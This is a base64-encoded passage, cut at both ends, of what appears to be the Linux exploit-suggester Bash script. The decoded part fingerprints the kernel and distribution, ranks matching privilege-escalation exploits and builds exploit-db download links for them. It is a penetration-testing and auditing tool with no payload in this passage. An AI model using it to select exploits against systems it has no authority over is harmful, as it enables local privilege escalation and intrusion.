pdGNoZXMgLXB8LS1wa2dsaXN0LWZpbGUgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKZmkKCiMgLS1jaGVja3NlYyBtb2RlIGlzIHN0YW5kYWxvbmUgbW9kZSBhbmQgaXMgbm90IGFwcGxpY2FibGUgd2hlbiBvbmUgb2YgLWsgfCAtdSB8IC1wIHwgLS1jdmVsaXN0LWZpbGUgc3dpdGNoZXMgYXJlIHNldAppZiBbICIkb3B0X2NoZWNrc2VjX21vZGUiID0gInRydWUiIF07IHRoZW4KICAgIFsgIiRvcHRfa2VybmVsX3ZlcnNpb24iID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC1rfC0ta2VybmVsIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtdXwtLXVuYW1lIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfcGtnbGlzdF9maWxlIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtcHwtLXBrZ2xpc3QtZmlsZSBhbmQgLS1jaGVja3NlYyBhcmUgbXV0dWFsbHkgZXhjbHVzaXZlLiBBYm9ydGluZy4iCmZpCgojIGV4dHJhY3Qga2VybmVsIHZlcnNpb24gYW5kIG90aGVyIE9TIGluZm8gbGlrZSBkaXN0cm8gbmFtZSwgZGlzdHJvIHZlcnNpb24sIGV0Yy4gMyBwb3NzaWJpbGl0aWVzIGhlcmU6CiMgY2FzZSAxOiAtLWtlcm5lbCBzZXQKaWYgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPT0gInRydWUiIF07IHRoZW4KICAgICMgVE9ETzogYWRkIGtlcm5lbCB2ZXJzaW9uIG51bWJlciB2YWxpZGF0aW9uCiAgICBbIC16ICIkS0VSTkVMIiBdICYmIGV4aXRXaXRoRXJyTXNnICJVbnJlY29nbml6ZWQga2VybmVsIHZlcnNpb24gZ2l2ZW4uIEFib3J0aW5nLiIKICAgIEFSQ0g9IiIKICAgIE9TPSIiCgogICAgIyBkbyBub3QgcGVyZm9ybSBhZGRpdGlvbmFsIGNoZWNrcyBvbiBjdXJyZW50IG1hY2hpbmUKICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKCiAgICAjIGRvIG5vdCBjb25zaWRlciBjdXJyZW50IE9TCiAgICBnZXRQa2dMaXN0ICIiICIkUEtHTElTVF9GSUxFIgoKIyBjYXNlIDI6IC0tdW5hbWUgc2V0CmVsaWYgWyAiJG9wdF91bmFtZV9zdHJpbmciID09ICJ0cnVlIiBdOyB0aGVuCiAgICBbIC16ICIkVU5BTUVfQSIgXSAmJiBleGl0V2l0aEVyck1zZyAidW5hbWUgc3RyaW5nIGVtcHR5LiBBYm9ydGluZy4iCiAgICBwYXJzZVVuYW1lICIkVU5BTUVfQSIKCiAgICAjIGRvIG5vdCBwZXJmb3JtIGFkZGl0aW9uYWwgY2hlY2tzIG9uIGN1cnJlbnQgbWFjaGluZQogICAgb3B0X3NraXBfbW9yZV9jaGVja3M9dHJ1ZQoKICAgICMgZG8gbm90IGNvbnNpZGVyIGN1cnJlbnQgT1MKICAgIGdldFBrZ0xpc3QgIiIgIiRQS0dMSVNUX0ZJTEUiCgojIGNhc2UgMzogLS1jdmVsaXN0LWZpbGUgbW9kZQplbGlmIFsgIiRvcHRfY3ZlbGlzdF9maWxlIiA9ICJ0cnVlIiBdOyB0aGVuCgogICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIGdldEtlcm5lbENvbmZpZwoKIyBjYXNlIDQ6IC0tY2hlY2tzZWMgbW9kZQplbGlmIFsgIiRvcHRfY2hlY2tzZWNfbW9kZSIgPSAidHJ1ZSIgXTsgdGhlbgoKICAgICMgdGhpcyBzd2l0Y2ggaXMgbm90IGFwcGxpY2FibGUgaW4gdGhpcyBtb2RlCiAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz1mYWxzZQoKICAgICMgZ2V0IGtlcm5lbCBjb25maWd1cmF0aW9uIGluIHRoaXMgbW9kZQogICAgZ2V0S2VybmVsQ29uZmlnCiAgICBbIC16ICIkS0NPTkZJRyIgXSAmJiBlY2hvICJXQVJOSU5HLiBLZXJuZWwgQ29uZmlnIG5vdCBmb3VuZCBvbiB0aGUgc3lzdGVtIHJlc3VsdHMgd29uJ3QgYmUgY29tcGxldGUuIgoKICAgICMgbGF1bmNoIGNoZWNrc2VjIG1vZGUKICAgIGNoZWNrc2VjTW9kZQoKICAgIGV4aXQgMAoKIyBjYXNlIDU6IG5vIC0tdW5hbWUgfCAtLWtlcm5lbCB8IC0tY3ZlbGlzdC1maWxlIHwgLS1jaGVja3NlYyBzZXQKZWxzZQoKICAgICMgLS1wa2dsaXN0LWZpbGUgTk9UIHByb3ZpZGVkOiB0YWtlIGFsbCBpbmZvIGZyb20gY3VycmVudCBtYWNoaW5lCiAgICAjIGNhc2UgZm9yIHZhbmlsbGEgZXhlY3V0aW9uOiAuL2xpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyLnNoCiAgICBpZiBbICIkb3B0X3BrZ2xpc3RfZmlsZSIgPT0gImZhbHNlIiBdOyB0aGVuCiAgICAgICAgVU5BTUVfQT0kKHVuYW1lIC1hKQogICAgICAgIFsgLXogIiRVTkFNRV9BIiBdICYmIGV4aXRXaXRoRXJyTXNnICJ1bmFtZSBzdHJpbmcgZW1wdHkuIEFib3J0aW5nLiIKICAgICAgICBwYXJzZVVuYW1lICIkVU5BTUVfQSIKCiAgICAgICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJmYWxzZSIgXSAmJiBnZXRLZXJuZWxDb25maWcKCiAgICAgICAgIyBleHRyYWN0IGRpc3RyaWJ1dGlvbiB2ZXJzaW9uIGZyb20gL2V0Yy9vcy1yZWxlYXNlIE9SIC9ldGMvbHNiLXJlbGVhc2UKICAgICAgICBbIC1uICIkT1MiIC1hICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIERJU1RSTz0kKGdyZXAgLXMgLUUgJ15ESVNUUklCX1JFTEVBU0U9fF5WRVJTSU9OX0lEPScgL2V0Yy8qLXJlbGVhc2UgfCBjdXQgLWQnPScgLWYyIHwgaGVhZCAtMSB8IHRyIC1kICciJykKCiAgICAgICAgIyBleHRyYWN0IHBhY2thZ2UgbGlzdGluZyBmcm9tIGN1cnJlbnQgT1MKICAgICAgICBnZXRQa2dMaXN0ICIkT1MiICIiCgogICAgIyAtLXBrZ2xpc3QtZmlsZSBwcm92aWRlZDogb25seSBjb25zaWRlciB1c2Vyc3BhY2UgZXhwbG9pdHMgYWdhaW5zdCBwcm92aWRlZCBwYWNrYWdlIGxpc3RpbmcKICAgIGVsc2UKICAgICAgICBLRVJORUw9IiIKICAgICAgICAjVE9ETzogZXh0cmFjdCBtYWNoaW5lIGFyY2ggZnJvbSBwYWNrYWdlIGxpc3RpbmcKICAgICAgICBBUkNIPSIiCiAgICAgICAgdW5zZXQgRVhQTE9JVFMKICAgICAgICBkZWNsYXJlIC1BIEVYUExPSVRTCiAgICAgICAgZ2V0UGtnTGlzdCAiIiAiJFBLR0xJU1RfRklMRSIKCiAgICAgICAgIyBhZGRpdGlvbmFsIGNoZWNrcyBhcmUgbm90IGFwcGxpY2FibGUgZm9yIHRoaXMgbW9kZQogICAgICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKICAgIGZpCmZpCgplY2hvCmVjaG8gLWUgIiR7Ymxkd2h0fUF2YWlsYWJsZSBpbmZvcm1hdGlvbjoke3R4dHJzdH0iCmVjaG8KWyAtbiAiJEtFUk5FTCIgXSAmJiBlY2hvIC1lICJLZXJuZWwgdmVyc2lvbjogJHt0eHRncm59JEtFUk5FTCR7dHh0cnN0fSIgfHwgZWNobyAtZSAiS2VybmVsIHZlcnNpb246ICR7dHh0cmVkfU4vQSR7dHh0cnN0fSIKZWNobyAiQXJjaGl0ZWN0dXJlOiAkKFsgLW4gIiRBUkNIIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRBUkNIJHt0eHRyc3R9IiB8fCBlY2hvIC1lICIke3R4dHJlZH1OL0Eke3R4dHJzdH0iKSIKZWNobyAiRGlzdHJpYnV0aW9uOiAkKFsgLW4gIiRPUyIgXSAmJiBlY2hvIC1lICIke3R4dGdybn0kT1Mke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgplY2hvIC1lICJEaXN0cmlidXRpb24gdmVyc2lvbjogJChbIC1uICIkRElTVFJPIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRESVNUUk8ke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgoKZWNobyAiQWRkaXRpb25hbCBjaGVja3MgKENPTkZJR18qLCBzeXNjdGwgZW50cmllcywgY3VzdG9tIEJhc2ggY29tbWFuZHMpOiAkKFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPT0gImZhbHNlIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufXBlcmZvcm1lZCR7dHh0cnN0fSIgfHwgZWNobyAtZSAiJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IikiCgppZiBbIC1uICIkUEtHTElTVF9GSUxFIiAtYSAtbiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRncm59JFBLR0xJU1RfRklMRSR7dHh0cnN0fSIKZWxpZiBbIC1uICIkUEtHTElTVF9GSUxFIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRyZWR9dW5yZWNvZ25pemVkIGZpbGUgcHJvdmlkZWQke3R4dHJzdH0iCmVsaWYgWyAtbiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICBwa2dMaXN0RmlsZT0iJHt0eHRncm59ZnJvbSBjdXJyZW50IE9TJHt0eHRyc3R9IgpmaQoKZWNobyAtZSAiUGFja2FnZSBsaXN0aW5nOiAkKFsgLW4gIiRwa2dMaXN0RmlsZSIgXSAmJiBlY2hvIC1lICIkcGtnTGlzdEZpbGUiIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgoKIyBoYW5kbGUgLS1rZXJuZWxzcGFjeS1vbmx5ICYgLS11c2Vyc3BhY2Utb25seSBmaWx0ZXIgb3B0aW9ucwppZiBbICIkb3B0X2tlcm5lbF9vbmx5IiA9ICJ0cnVlIiAtbyAteiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICB1bnNldCBFWFBMT0lUU19VU0VSU1BBQ0UKICAgIGRlY2xhcmUgLUEgRVhQTE9JVFNfVVNFUlNQQUNFCmZpCgppZiBbICIkb3B0X3VzZXJzcGFjZV9vbmx5IiA9ICJ0cnVlIiBdOyB0aGVuCiAgICB1bnNldCBFWFBMT0lUUwogICAgZGVjbGFyZSAtQSBFWFBMT0lUUwpmaQoKZWNobwplY2hvIC1lICIke2JsZHdodH1TZWFyY2hpbmcgYW1vbmc6JHt0eHRyc3R9IgplY2hvCmVjaG8gIiR7I0VYUExPSVRTW0BdfSBrZXJuZWwgc3BhY2UgZXhwbG9pdHMiCmVjaG8gIiR7I0VYUExPSVRTX1VTRVJTUEFDRVtAXX0gdXNlciBzcGFjZSBleHBsb2l0cyIKZWNobwoKZWNobyAtZSAiJHtibGR3aHR9UG9zc2libGUgRXhwbG9pdHM6JHt0eHRyc3R9IgplY2hvCgojIHN0YXJ0IGFuYWx5c2lzCmo9MApmb3IgRVhQIGluICIke0VYUExPSVRTW0BdfSIgIiR7RVhQTE9JVFNfVVNFUlNQQUNFW0BdfSI7IGRvCgogICAgIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRVhQIgoKICAgIE5BTUU9IiR7YXJyWzBdfSIgJiYgTkFNRT0iJHtOQU1FOjZ9IgogICAgUkVRUz0iJHthcnJbMV19IiAmJiBSRVFTPSIke1JFUVM6Nn0iCiAgICBUQUdTPSIke2FyclsyXX0iICYmIFRBR1M9IiR7VEFHUzo2fSIKICAgIFJBTks9IiR7YXJyWzNdfSIgJiYgUkFOSz0iJHtSQU5LOjZ9IgoKICAgICMgc3BsaXQgbGluZSB3aXRoIHJlcXVpcmVtZW50cyAmIGxvb3AgdGhydSBhbGwgcmVxcyBvbmUgYnkgb25lICYgY2hlY2sgd2hldGhlciBpdCBpcyBtZXQKICAgIElGUz0nLCcgcmVhZCAtciAtYSBhcnJheSA8PDwgIiRSRVFTIgogICAgUkVRU19OVU09JHsjYXJyYXlbQF19CiAgICBQQVNTRURfUkVRPTAKICAgIGZvciBSRVEgaW4gIiR7YXJyYXlbQF19IjsgZG8KICAgICAgICBpZiAoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIgIiR7YXJyYXlbMF19Iik7IHRoZW4KICAgICAgICAgICAgUEFTU0VEX1JFUT0kKCgkUEFTU0VEX1JFUSArIDEpKQogICAgICAgIGVsc2UKICAgICAgICAgICAgYnJlYWsKICAgICAgICBmaQogICAgZG9uZQoKICAgICMgZXhlY3V0ZSBmb3IgZXhwbG9pdHMgd2l0aCBhbGwgcmVxdWlyZW1lbnRzIG1ldAogICAgaWYgWyAkUEFTU0VEX1JFUSAtZXEgJFJFUVNfTlVNIF07IHRoZW4KCiAgICAgICAgIyBhZGRpdGlvbmFsIHJlcXVpcmVtZW50IGZvciAtLWN2ZWxpc3QtZmlsZSBtb2RlOiBjaGVjayBpZiBDVkUgYXNzb2NpYXRlZCB3aXRoIHRoZSBleHBsb2l0IGlzIG9uIHRoZSBDVkVMSVNUX0ZJTEUKICAgICAgICBpZiBbICIkb3B0X2N2ZWxpc3RfZmlsZSIgPSAidHJ1ZSIgXTsgdGhlbgoKICAgICAgICAgICAgIyBleHRyYWN0IENWRShzKSBhc3NvY2lhdGVkIHdpdGggZ2l2ZW4gZXhwbG9pdCAoYWxzbyB0cmFuc2xhdGVzICcsJyB0byAnfCcgZm9yIGVhc3kgaGFuZGxpbmcgbXVsdGlwbGUgQ1ZFcyBjYXNlIC0gdmlhIGV4dGVuZGVkIHJlZ2V4KQogICAgICAgICAgICBjdmU9JChlY2hvICIkTkFNRSIgfCBncmVwICcuKlxbLipcXS4qJyB8IGN1dCAtZCAnbScgLWYyIHwgY3V0IC1kICddJyAtZjEgfCB0ciAtZCAnWycgfCB0ciAiLCIgInwiKQogICAgICAgICAgICAjZWNobyAiQ1ZFOiAkY3ZlIgoKICAgICAgICAgICAgIyBjaGVjayBpZiBpdCdzIG9uIENWRUxJU1RfRklMRSBsaXN0LCBpZiBubyBtb3ZlIHRvIG5leHQgZXhwbG9pdAogICAgICAgICAgICBbICEgJChjYXQgIiRDVkVMSVNUX0ZJTEUiIHwgZ3JlcCAtRSAiJGN2ZSIpIF0gJiYgY29udGludWUKICAgICAgICBmaQoKICAgICAgICAjIHByb2Nlc3MgdGFncyBhbmQgaGlnaGxpZ2h0IHRob3NlIHRoYXQgbWF0Y2ggY3VycmVudCBPUyAob25seSBmb3IgZGVifHVidW50dXxSSEVMIGFuZCBpZiB3ZSBrbm93IGRpc3RybyB2ZXJzaW9uIC0gZGlyZWN0IG1vZGUpCiAgICAgICAgdGFncz0iIgogICAgICAgIGlmIFsgLW4gIiRUQUdTIiAtYSAtbiAiJE9TIiBdOyB0aGVuCiAgICAgICAgICAgIElGUz0nLCcgcmVhZCAtciAtYSB0YWdzX2FycmF5IDw8PCAiJFRBR1MiCiAgICAgICAgICAgIFRBR1NfTlVNPSR7I3RhZ3NfYXJyYXlbQF19CgogICAgICAgICAgICAjIGJ1bXAgUkFOSyBzbGlnaHRseSAoKzEpIGlmIHdlJ3JlIGluICctLXVuYW1lJyBtb2RlIGFuZCB0aGVyZSdzIGEgVEFHIGZvciBPUyBmcm9tIHVuYW1lIHN0cmluZwogICAgICAgICAgICBbICIkKGVjaG8gIiR7dGFnc19hcnJheVtAXX0iIHwgZ3JlcCAiJE9TIikiIC1hICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gInRydWUiIF0gJiYgUkFOSz0kKCgkUkFOSyArIDEpKQoKICAgICAgICAgICAgZm9yIFRBRyBpbiAiJHt0YWdzX2FycmF5W0BdfSI7IGRvCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvPSQoZWNobyAiJFRBRyIgfCBjdXQgLWQnPScgLWYxKQogICAgICAgICAgICAgICAgdGFnX2Rpc3Ryb19udW1fYWxsPSQoZWNobyAiJFRBRyIgfCBjdXQgLWQnPScgLWYyKQogICAgICAgICAgICAgICAgIyBpbiBjYXNlIG9mIHRhZyBvZiBmb3JtOiAndWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMX0gcmVtb3ZlIGtlcm5lbCB2ZXJzaW9uaW5nIHBhcnQgZm9yIGNvbXBhcmlzaW9uCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvX251bT0iJHt0YWdfZGlzdHJvX251bV9hbGwleyp9IgoKICAgICAgICAgICAgICAgICMgd2UncmUgaW4gJy0tdW5hbWUnIG1vZGUgT1IgKGZvciBub3JtYWwgbW9kZSkgaWYgdGhlcmUgaXMgZGlzdHJvIHZlcnNpb24gbWF0Y2gKICAgICAgICAgICAgICAgIGlmIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAidHJ1ZSIgLW8gXCggIiRPUyIgPT0gIiR0YWdfZGlzdHJvIiAtYSAiJChlY2hvICIkRElTVFJPIiB8IGdyZXAgLUUgIiR0YWdfZGlzdHJvX251bSIpIiBcKSBdOyB0aGVuCgogICAgICAgICAgICAgICAgICAgICMgYnVtcCBjdXJyZW50IGV4cGxvaXQncyByYW5rIGJ5IDIgZm9yIGRpc3RybyBtYXRjaCAoYW5kIG5vdCBpbiAnLS11bmFtZScgbW9kZSkKICAgICAgICAgICAgICAgICAgICBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gImZhbHNlIiBdICYmIFJBTks9JCgoJFJBTksgKyAyKSkKCiAgICAgICAgICAgICAgICAgICAgIyBnZXQgbmFtZSAoa2VybmVsIG9yIHBhY2thZ2UgbmFtZSkgYW5kIHZlcnNpb24gb2Yga2VybmVsL3BrZyBpZiBwcm92aWRlZDoKICAgICAgICAgICAgICAgICAgICB0YWdfcGtnPSQoZWNobyAiJHRhZ19kaXN0cm9fbnVtX2FsbCIgfCBjdXQgLWQneycgLWYgMiB8IHRyIC1kICd9JyB8IGN1dCAtZCc6JyAtZiAxKQogICAgICAgICAgICAgICAgICAgIHRhZ19wa2dfbnVtPSIiCiAgICAgICAgICAgICAgICAgICAgWyAkKGVjaG8gIiR0YWdfZGlzdHJvX251bV9hbGwiIHwgZ3JlcCAneycpIF0gJiYgdGFnX3BrZ19udW09JChlY2hvICIkdGFnX2Rpc3Ryb19udW1fYWxsIiB8IGN1dCAtZCd7JyAtZiAyIHwgdHIgLWQgJ30nIHwgY3V0IC1kJzonIC1mIDIpCgogICAgICAgICAgICAgICAgICAgICNbIC1uICIkdGFnX3BrZ19udW0iIF0gJiYgZWNobyAidGFnX3BrZ19udW06ICR0YWdfcGtnX251bTsga2VybmVsOiAkS0VSTkVMX0FMTCIKCiAgICAgICAgICAgICAgICAgICAgIyBpZiBwa2cva2VybmVsIHZlcnNpb24gaXMgbm90IHByb3ZpZGVkOgogICAgICAgICAgICAgICAgICAgIGlmIFsgLXogIiR0YWdfcGtnX251bSIgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gImZhbHNlIiBdICYmIFRBRz0iJHtsaWdodHllbGxvd31bICR7VEFHfSBdJHt0eHRyc3R9IgoKICAgICAgICAgICAgICAgICAgICAjIGtlcm5lbCB2ZXJzaW9uIHByb3ZpZGVkLCBjaGVjayBmb3IgbWF0Y2g6CiAgICAgICAgICAgICAgICAgICAgZWxpZiBbIC1uICIkdGFnX3BrZ19udW0iIC1hICIkdGFnX3BrZyIgPSAia2VybmVsIiBdOyB0aGVuCiAgICAgICAgICAgICAgICAgICAgICAgIGlmIFsgJChlY2hvICIkS0VSTkVMX0FMTCIgfCBncmVwIC1FICIke3RhZ19wa2dfbnVtfSIpIF07IHRoZW4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICMga2VybmVsIHZlcnNpb24gbWF0Y2hlZCAtIGJvbGQgaGlnaGxpZ2h0CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUQUc9IiR7eWVsbG93fVsgJHtUQUd9IF0ke3R4dHJzdH0iCgogICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBidW1wIGN1cnJlbnQgZXhwbG9pdCdzIHJhbmsgYWRkaXRpb25hbGx5IGJ5IDMgZm9yIGtlcm5lbCB2ZXJzaW9uIHJlZ2V4IG1hdGNoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBSQU5LPSQoKCRSQU5LICsgMykpCiAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UKICAgICAgICAgICAgICAgICAgICAgICAgICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAiZmFsc2UiIF0gJiYgVEFHPSIke2xpZ2h0eWVsbG93fVsgJHRhZ19kaXN0cm89JHRhZ19kaXN0cm9fbnVtIF0ke3R4dHJzdH17a2VybmVsOiR0YWdfcGtnX251bX0iCiAgICAgICAgICAgICAgICAgICAgICAgIGZpCgogICAgICAgICAgICAgICAgICAgICMgcGtnIHZlcnNpb24gcHJvdmlkZWQsIGNoZWNrIGZvciBtYXRjaCAoVEJEKToKICAgICAgICAgICAgICAgICAgICBlbGlmIFsgLW4gIiR0YWdfcGtnX251bSIgLWEgLW4gIiR0YWdfcGtnIiAgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICBUQUc9IiR7bGlnaHR5ZWxsb3d9WyAkdGFnX2Rpc3Rybz0kdGFnX2Rpc3Ryb19udW0gXSR7dHh0cnN0fXskdGFnX3BrZzokdGFnX3BrZ19udW19IgogICAgICAgICAgICAgICAgICAgIGZpCgogICAgICAgICAgICAgICAgZmkKCiAgICAgICAgICAgICAgICAjIGFwcGVuZCBjdXJyZW50IHRhZyB0byB0YWdzIGxpc3QKICAgICAgICAgICAgICAgIHRhZ3M9IiR7dGFnc30ke1RBR30sIgogICAgICAgICAgICBkb25lCiAgICAgICAgICAgICMgdHJpbSAnLCcgYWRkZWQgYnkgYWJvdmUgbG9vcAogICAgICAgICAgICBbIC1uICIkdGFncyIgXSAmJiB0YWdzPSIke3RhZ3MlP30iCiAgICAgICAgZWxzZQogICAgICAgICAgICB0YWdzPSIkVEFHUyIKICAgICAgICBmaQoKICAgICAgICAjIGluc2VydCB0aGUgbWF0Y2hlZCBleHBsb2l0ICh3aXRoIGNhbGN1bGF0ZWQgUmFuayBhbmQgaGlnaGxpZ2h0ZWQgdGFncykgdG8gYXJyYXJ5IHRoYXQgd2lsbCBiZSBzb3J0ZWQKICAgICAgICBFWFA9JChlY2hvICIkRVhQIiB8IHNlZCAtZSAnL15OYW1lOi9kJyAtZSAnL15SZXFzOi9kJyAtZSAnL15UYWdzOi9kJykKICAgICAgICBleHBsb2l0c190b19zb3J0W2pdPSIke1JBTkt9TmFtZTogJHtOQU1FfUQzTDFtUmVxczogJHtSRVFTfUQzTDFtVGFnczogJHt0YWdzfUQzTDFtJChlY2hvICIkRVhQIiB8IHNlZCAtZSAnOmEnIC1lICdOJyAtZSAnJCFiYScgLWUgJ3MvXG4vRDNMMW0vZycpIgogICAgICAgICgoaisrKSkKICAgIGZpCmRvbmUKCiMgc29ydCBleHBsb2l0cyBiYXNlZCBvbiBjYWxjdWxhdGVkIFJhbmsKSUZTPSQnXG4nClNPUlRFRF9FWFBMT0lUUz0oJChzb3J0IC1yIDw8PCIke2V4cGxvaXRzX3RvX3NvcnRbKl19IikpCnVuc2V0IElGUwoKIyBkaXNwbGF5IHNvcnRlZCBleHBsb2l0cwpmb3IgRVhQX1RFTVAgaW4gIiR7U09SVEVEX0VYUExPSVRTW0BdfSI7IGRvCgoJUkFOSz0kKGVjaG8gIiRFWFBfVEVNUCIgfCBhd2sgLUYnTmFtZTonICd7cHJpbnQgJDF9JykKCgkjIGNvbnZlcnQgZW50cnkgYmFjayB0byBjYW5vbmljYWwgZm9ybQoJRVhQPSQoZWNobyAiJEVYUF9URU1QIiB8IHNlZCAncy9eWzAtOV0vL2cnIHwgc2VkICdzL0QzTDFtL1xuL2cnKQoKCSMgY3JlYXRlIGFycmF5IGZyb20gY3VycmVudCBleHBsb2l0IGhlcmUgZG9jIGFuZCBmZXRjaCBuZWVkZWQgbGluZXMKICAgIGk9MAogICAgIyAoJy1yJyBpcyB1c2VkIHRvIG5vdCBpbnRlcnByZXQgYmFja3NsYXNoIHVzZWQgZm9yIGJhc2ggY29sb3JzKQogICAgd2hpbGUgcmVhZCAtciBsaW5lCiAgICBkbwogICAgICAgIGFycltpXT0iJGxpbmUiCiAgICAgICAgaT0kKChpICsgMSkpCiAgICBkb25lIDw8PCAiJEVYUCIKCiAgICBOQU1FPSIke2FyclswXX0iICYmIE5BTUU9IiR7TkFNRTo2fSIKICAgIFJFUVM9IiR7YXJyWzFdfSIgJiYgUkVRUz0iJHtSRVFTOjZ9IgogICAgVEFHUz0iJHthcnJbMl19IiAmJiB0YWdzPSIke1RBR1M6Nn0iCgoJRVhQTE9JVF9EQj0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiZXhwbG9pdC1kYjogIiB8IGF3ayAne3ByaW50ICQyfScpCglhbmFseXNpc191cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImFuYWx5c2lzLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglleHRfdXJsPSQoZWNobyAiJEVYUCIgfCBncmVwICJleHQtdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCWNvbW1lbnRzPSQoZWNobyAiJEVYUCIgfCBncmVwICJDb21tZW50czogIiB8IGN1dCAtZCcgJyAtZiAyLSkKCXJlcXM9JChlY2hvICIkRVhQIiB8IGdyZXAgIlJlcXM6ICIgfCBjdXQgLWQnICcgLWYgMikKCgkjIGV4cGxvaXQgbmFtZSB3aXRob3V0IENWRSBudW1iZXIgYW5kIHdpdGhvdXQgY29tbW9ubHkgdXNlZCBzcGVjaWFsIGNoYXJzCgluYW1lPSQoZWNobyAiJE5BTUUiIHwgY3V0IC1kJyAnIC1mIDItIHwgdHIgLWQgJyAoKS8nKQoKCWJpbl91cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImJpbi11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoJc3JjX3VybD0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAic3JjLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglbIC16ICIkc3JjX3VybCIgXSAmJiBbIC1uICIkRVhQTE9JVF9EQiIgXSAmJiBzcmNfdXJsPSJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9kb3dubG9hZC8kRVhQTE9JVF9EQiIKCVsgLXogIiRzcmNfdXJsIiBdICYmIFsgLXogIiRiaW5fdXJsIiBdICYmIGV4aXRXaXRoRXJyTXNnICInc3JjLXVybCcgLyAnYmluLXVybCcgLyAnZXhwbG9pdC1kYicgZW50cmllcyBhcmUgYWxsIGVtcHR5IGZvciAnJE5BTUUnIGV4cGxvaXQgLSBmaXggdGhhdC4gQWJvcnRpbmcuIgoKCWlmIFsgLW4gIiRhbmFseXNpc191cmwiIF07IHRoZW4KICAgICAgICBkZXRhaWxzPSIkYW5hbHlzaXNfdXJsIgoJZWxpZiAkKGVjaG8gIiRzcmNfdXJsIiB8IGdyZXAgLXEgJ3d3dy5leHBsb2l0LWRiLmNvbScpOyB0aGVuCiAgICAgICAgZGV0YWlscz0iaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvJEVYUExPSVRfREIvIgoJZWxpZiBbWyAiJHNyY191cmwiID1+IF4uKnRnenx0YXIuZ3p8emlwJCAmJiAtbiAiJEVYUExPSVRfREIiIF1dOyB0aGVuCiAgICAgICAgZGV0YWlscz0iaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvJEVYUExPSVRfREIvIgoJZWxzZQogICAgICAgIGRldGFpbHM9IiRzcmNfdXJsIgoJZmkKCgkjIHNraXAgRG9TIGJ5IGRlZmF1bHQKCWRvcz0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAtbyAtaSAiKGRvcyIpCglbICIkb3B0X3